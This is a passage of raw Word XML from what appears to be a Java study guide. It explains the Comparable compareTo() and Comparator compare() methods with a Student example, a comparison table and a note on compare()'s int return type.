        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="165454A0"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udent s1 = new Student("Alice", 20);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C3F4216"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udent s2 = new Student("Bob", 25);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61D7162A"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s1.compareTo(s2)); // Will return a negative value (20 - 25)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="137A30BD" w14:textId="77777777" w:rsidR="00EE15F1" w:rsidRPr="00CE4B95" w:rsidRDefault="00EE15F1" w:rsidP="004E68C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compare() Method</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51AC7037" w14:textId="77777777" w:rsidR="00EE15F1" w:rsidRPr="00CE4B95" w:rsidRDefault="00EE15F1" w:rsidP="004E68C7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4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r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: It is a method defined in the Comparator interface. It is used for comparing two objects of any class (not necessarily the current class), and it allows for custom ordering of objects.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F59D89A" w14:textId="77777777" w:rsidR="00EE15F1" w:rsidRPr="00CE4B95" w:rsidRDefault="00EE15F1" w:rsidP="004E68C7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4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w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Typically used when you need a different or custom sorting logic than the natural ordering defined by compareTo().</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14D777FF" w14:textId="77777777" w:rsidR="00EE15F1" w:rsidRPr="00CE4B95" w:rsidRDefault="00EE15F1" w:rsidP="004E68C7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4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ignature</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: public int compare(T o1, T o2)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29232244" w14:textId="77777777" w:rsidR="00EE15F1" w:rsidRPr="00CE4B95" w:rsidRDefault="00EE15F1" w:rsidP="004E68C7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4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turn Value</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43E6601F" w14:textId="77777777" w:rsidR="00EE15F1" w:rsidRPr="00CE4B95" w:rsidRDefault="00EE15F1" w:rsidP="004E68C7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="4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s 0 if the two objects are equal.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="780261CC" w14:textId="77777777" w:rsidR="00EE15F1" w:rsidRPr="00CE4B95" w:rsidRDefault="00EE15F1" w:rsidP="004E68C7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="4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s a negative integer if o1 is less than o2.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E6EB577" w14:textId="77777777" w:rsidR="00EE15F1" w:rsidRPr="00CE4B95" w:rsidRDefault="00EE15F1" w:rsidP="004E68C7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="4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s a positive integer if o1 is greater than o2.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48344E80" w14:textId="77777777" w:rsidR="00EE15F1" w:rsidRPr="00CE4B95" w:rsidRDefault="00EE15F1" w:rsidP="004E68C7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4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r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19B46E27"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39F285FE" w14:textId="77777777" w:rsidR="00EE15F1" w:rsidRPr="00CE4B95" w:rsidRDefault="00EE15F1" w:rsidP="004E68C7">
      <w:pPr>
        <w:ind w:left="720"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="280B211D"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tudent {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E022615"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ring name;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="437BD795"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int age;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="010A54D0" w14:textId="77777777" w:rsidR="00EE15F1" w:rsidRPr="00CE4B95" w:rsidRDefault="00EE15F1" w:rsidP="004E68C7">
      <w:pPr>
        <w:ind w:left="720"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="04644F56"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udent(String name, int age) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17444A52"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name = name;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31E3F3FB"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age = age;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1113A3A2"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979336D" w14:textId="77777777" w:rsidR="00EE15F1" w:rsidRPr="00CE4B95" w:rsidRDefault="00EE15F1" w:rsidP="004E68C7">
      <w:pPr>
        <w:ind w:left="720"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="79B6B190"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ring getName() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70C6E0C3"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name;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18A997FF"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D38CE8E" w14:textId="77777777" w:rsidR="00EE15F1" w:rsidRPr="00CE4B95" w:rsidRDefault="00EE15F1" w:rsidP="004E68C7">
      <w:pPr>
        <w:ind w:left="720"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4758EAE9"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int getAge() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3938D7DE"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age;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54BE36B7"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045E6DF"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4B6AB11" w14:textId="77777777" w:rsidR="00EE15F1" w:rsidRPr="00CE4B95" w:rsidRDefault="00EE15F1" w:rsidP="004E68C7">
      <w:pPr>
        <w:ind w:left="720"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5ECD6B8A"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AgeComparator implements Comparator&lt;Student&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09A36819"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5CDD4E30"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int compare(Student s1, Student s2) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="310D6FBD"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s1.getAge() - s2.getAge(); // Compare by age</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B847981"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4362D84"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D7D1145" w14:textId="77777777" w:rsidR="00EE15F1" w:rsidRPr="00CE4B95" w:rsidRDefault="00EE15F1" w:rsidP="004E68C7">
      <w:pPr>
        <w:ind w:left="720"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="020C68A0"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static void main(String[] args) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31166C76"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Student&gt; students = Arrays.asList(</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="444BB666"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new Student("Alice", 20),</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27A13522"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new Student("Bob", 25),</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E80172A"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new Student("Charlie", 18)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4305A0D7"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9F8383D" w14:textId="77777777" w:rsidR="00EE15F1" w:rsidRPr="00CE4B95" w:rsidRDefault="00EE15F1" w:rsidP="004E68C7">
      <w:pPr>
        <w:ind w:left="720"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="529257B9"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ions.sort(students, new AgeComparator());</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="533C2CB2"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 After sorting, students will be ordered by age.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="468B965C" w14:textId="77777777" w:rsidR="00EE15F1" w:rsidRPr="00CE4B95" w:rsidRDefault="00EE15F1" w:rsidP="004E68C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4141E43" w14:textId="77777777" w:rsidR="00EE15F1" w:rsidRPr="00CE4B95" w:rsidRDefault="00EE15F1" w:rsidP="004E68C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Differences Between compareTo() and compar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8"/>
        <w:gridCol w:w="4286"/>
        <w:gridCol w:w="4300"/>
      </w:tblGrid>
      <w:tr w:rsidR="004E68C7" w:rsidRPr="00CE4B95" w14:paraId="6370986B" w14:textId="77777777" w:rsidTr="00EE15F1">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="42D9DE2F" w14:textId="77777777" w:rsidR="00EE15F1" w:rsidRPr="00CE4B95" w:rsidRDefault="00EE15F1" w:rsidP="004E68C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3B2D9601" w14:textId="77777777" w:rsidR="00EE15F1" w:rsidRPr="00CE4B95" w:rsidRDefault="00EE15F1" w:rsidP="004E68C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pareTo()</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5EE0718A" w14:textId="77777777" w:rsidR="00EE15F1" w:rsidRPr="00CE4B95" w:rsidRDefault="00EE15F1" w:rsidP="004E68C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pare()</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004E68C7" w:rsidRPr="00CE4B95" w14:paraId="3FB7AFD4" w14:textId="77777777" w:rsidTr="00EE15F1">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7194202D" w14:textId="77777777" w:rsidR="00EE15F1" w:rsidRPr="00CE4B95" w:rsidRDefault="00EE15F1" w:rsidP="004E68C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ined in</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5AA36059" w14:textId="77777777" w:rsidR="00EE15F1" w:rsidRPr="00CE4B95" w:rsidRDefault="00EE15F1" w:rsidP="004E68C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arable interface</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="48B415DE" w14:textId="77777777" w:rsidR="00EE15F1" w:rsidRPr="00CE4B95" w:rsidRDefault="00EE15F1" w:rsidP="004E68C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arator interface</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004E68C7" w:rsidRPr="00CE4B95" w14:paraId="10331AA2" w14:textId="77777777" w:rsidTr="00EE15F1">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="04E12B1D" w14:textId="77777777" w:rsidR="00EE15F1" w:rsidRPr="00CE4B95" w:rsidRDefault="00EE15F1" w:rsidP="004E68C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d for</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4D3FBBDF" w14:textId="77777777" w:rsidR="00EE15F1" w:rsidRPr="00CE4B95" w:rsidRDefault="00EE15F1" w:rsidP="004E68C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atural ordering of objects</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="211726AA" w14:textId="77777777" w:rsidR="00EE15F1" w:rsidRPr="00CE4B95" w:rsidRDefault="00EE15F1" w:rsidP="004E68C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ustom ordering of objects</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004E68C7" w:rsidRPr="00CE4B95" w14:paraId="5BC90E4A" w14:textId="77777777" w:rsidTr="00EE15F1">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="13916849" w14:textId="77777777" w:rsidR="00EE15F1" w:rsidRPr="00CE4B95" w:rsidRDefault="00EE15F1" w:rsidP="004E68C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 Signature</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4C5A6B2C" w14:textId="77777777" w:rsidR="00EE15F1" w:rsidRPr="00CE4B95" w:rsidRDefault="00EE15F1" w:rsidP="004E68C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 compareTo(T o)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="43CE48BB" w14:textId="77777777" w:rsidR="00EE15F1" w:rsidRPr="00CE4B95" w:rsidRDefault="00EE15F1" w:rsidP="004E68C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 compare(T o1, T o2)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004E68C7" w:rsidRPr="00CE4B95" w14:paraId="1DFD8287" w14:textId="77777777" w:rsidTr="00EE15F1">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4B361D5A" w14:textId="77777777" w:rsidR="00EE15F1" w:rsidRPr="00CE4B95" w:rsidRDefault="00EE15F1" w:rsidP="004E68C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text</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7610D1D2" w14:textId="77777777" w:rsidR="00EE15F1" w:rsidRPr="00CE4B95" w:rsidRDefault="00EE15F1" w:rsidP="004E68C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when objects are compared within their own class (implements Comparable)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7E4E541B" w14:textId="77777777" w:rsidR="00EE15F1" w:rsidRPr="00CE4B95" w:rsidRDefault="00EE15F1" w:rsidP="004E68C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when a custom comparison logic is required (typically in sorting or collections)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004E68C7" w:rsidRPr="00CE4B95" w14:paraId="455CF7EE" w14:textId="77777777" w:rsidTr="00EE15F1">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="21852C1E" w14:textId="77777777" w:rsidR="00EE15F1" w:rsidRPr="00CE4B95" w:rsidRDefault="00EE15F1" w:rsidP="004E68C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bject Being Compared</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0CFA41C9" w14:textId="77777777" w:rsidR="00EE15F1" w:rsidRPr="00CE4B95" w:rsidRDefault="00EE15F1" w:rsidP="004E68C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ares the current object (this) with the given object (o)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="77BA690C" w14:textId="77777777" w:rsidR="00EE15F1" w:rsidRPr="00CE4B95" w:rsidRDefault="00EE15F1" w:rsidP="004E68C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ares two separate objects (o1, o2)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004E68C7" w:rsidRPr="00CE4B95" w14:paraId="53CDF7A0" w14:textId="77777777" w:rsidTr="00EE15F1">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1AA047FF" w14:textId="77777777" w:rsidR="00EE15F1" w:rsidRPr="00CE4B95" w:rsidRDefault="00EE15F1" w:rsidP="004E68C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w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="11F6AFA5" w14:textId="77777777" w:rsidR="00EE15F1" w:rsidRPr="00CE4B95" w:rsidRDefault="00EE15F1" w:rsidP="004E68C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ften used when the class implements Comparable</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3FBD14A6" w14:textId="77777777" w:rsidR="00EE15F1" w:rsidRPr="00CE4B95" w:rsidRDefault="00EE15F1" w:rsidP="004E68C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ften used when we want a custom sorting order without changing the class itself</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="1FA18E5E" w14:textId="77777777" w:rsidR="00EE15F1" w:rsidRPr="00CE4B95" w:rsidRDefault="00EE15F1" w:rsidP="004E68C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13DF6C71" w14:textId="77777777" w:rsidR="00EE15F1" w:rsidRPr="00CE4B95" w:rsidRDefault="00EE15F1" w:rsidP="004E68C7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4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areTo()</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: A method from the Comparable interface used to define the natural ordering of objects within a class.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D4FD8AE" w14:textId="77777777" w:rsidR="00EE15F1" w:rsidRPr="00CE4B95" w:rsidRDefault="00EE15F1" w:rsidP="004E68C7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4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are()</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: A method from the Comparator interface used to define custom comparison logic, allowing comparisons between objects of any class.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B387CCD" w14:textId="77777777" w:rsidR="00EE15F1" w:rsidRPr="00CE4B95" w:rsidRDefault="00EE15F1" w:rsidP="004E68C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oth methods are crucial in sorting and comparing objects, but compareTo() is typically used for natural ordering, while compare() is used for custom ordering in scenarios like sorting a list with a specific criterion.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78902DB1" w14:textId="38623B1C"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1E279AA">
          <v:rect id="_x0000_i1190" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="2637C177" w14:textId="189AAEC7" w:rsidR="001D1EE4" w:rsidRPr="00CE4B95" w:rsidRDefault="005D2449">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="63" w:name="_Toc196307543"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>What is the return type of compare method</w:t>
      </w:r>
      <w:r w:rsidR="001D1EE4" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="63"/>
    </w:p>
    <w:p w14:paraId="07531E75" w14:textId="0D593EE9" w:rsidR="006453AF" w:rsidRPr="00CE4B95" w:rsidRDefault="006453AF" w:rsidP="00C81DCA">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return type of the compare() method in the Comparator interface is </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>int</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AC41F5C" w14:textId="77777777" w:rsidR="006453AF" w:rsidRPr="00CE4B95" w:rsidRDefault="006453AF" w:rsidP="00C81DC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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70F3D061" w14:textId="77777777" w:rsidR="006453AF" w:rsidRPr="00CE4B95" w:rsidRDefault="006453AF" w:rsidP="00C81DCA">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="43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t compare(T o1, T o2)</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: This method compares two objects, o1 and o2, and returns an integer value that indicates the order of the two objects.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="548E0FC6"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possible return values are:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6900068E" w14:textId="77777777" w:rsidR="006453AF" w:rsidRPr="00CE4B95" w:rsidRDefault="006453AF" w:rsidP="00C81DCA">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4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egative integer</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: If o1 is less than o2.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41085771" w14:textId="77777777" w:rsidR="006453AF" w:rsidRPr="00CE4B95" w:rsidRDefault="006453AF" w:rsidP="00C81DCA">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4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Zero</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: If o1 is equal to o2.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="780F6C6E" w14:textId="77777777" w:rsidR="006453AF" w:rsidRPr="00CE4B95" w:rsidRDefault="006453AF" w:rsidP="00C81DCA">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4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ositive integer</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: If o1 is greater than o2.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02BFA4C3" w14:textId="77777777" w:rsidR="006453AF" w:rsidRPr="00CE4B95" w:rsidRDefault="006453AF" w:rsidP="00C81DC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0D20766E"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="316C062C" w14:textId="77777777" w:rsidR="006453AF" w:rsidRPr="00CE4B95" w:rsidRDefault="006453AF" w:rsidP="00C81DCA">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
